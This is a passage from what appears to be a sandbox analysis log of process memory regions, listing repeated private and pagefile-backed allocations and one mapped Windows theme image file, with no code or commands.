0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5170 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5171 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5172 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5173 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5174 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5175 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5176 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5177 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5178 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5179 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5180 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5181 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5182 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5183 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5184 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5185 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5186 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5187 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5188 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5189 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5190 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5191 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5192 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5193 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5194 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5195 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5196 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5197 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5198 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5199 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5200 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5201 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5202 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5203 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5204 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5205 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5206 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5207 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5208 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5209 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5210 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5211 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5212 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5213 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5214 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5215 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5216 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5217 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5218 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5219 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5220 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5221 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5222 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5223 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5224 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5225 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5226 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5227 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5228 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5229 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5230 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5231 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5232 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5233 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5234 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5235 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5236 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5237 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5238 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5239 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5240 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5241 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5242 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5243 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5244 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5245 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5246 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5247 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5248 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5249 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5250 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5251 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5252 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5253 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5254 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5255 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5256 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5257 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5258 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5259 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5260 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5261 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5262 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5263 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5264 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5265 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5266 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5267 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5268 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5269 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5270 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5271 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5272 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5273 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5274 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5275 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5276 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5277 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5278 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5279 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5280 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5281 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5282 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5283 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5284 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5285 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5286 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5287 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5288 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5289 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5290 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5291 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5292 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5293 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5294 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5295 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5296 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5297 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5298 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5299 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5300 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5301 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5302 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5303 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5304 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5305 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5306 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5307 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5308 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5309 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5310 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5311 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5312 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5313 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5314 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5315 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5316 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5317 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5318 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5319 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5320 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5321 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5322 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5323 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5324 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5325 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5326 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5327 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5328 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5329 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5330 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5331 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5332 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5333 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5334 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5335 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5336 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5337 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5338 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5339 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 5340 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5341 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 5342 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5343 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5344 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5345 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5346 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5347 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5348 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5349 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5350 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5351 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5352 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5353 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5354 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5355 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5356 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5357 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5358 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5359 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5360 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5361 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5362 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5363 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5364 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5365 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5366 start_va = 0x2360000 end_va = 0x237bfff monitored = 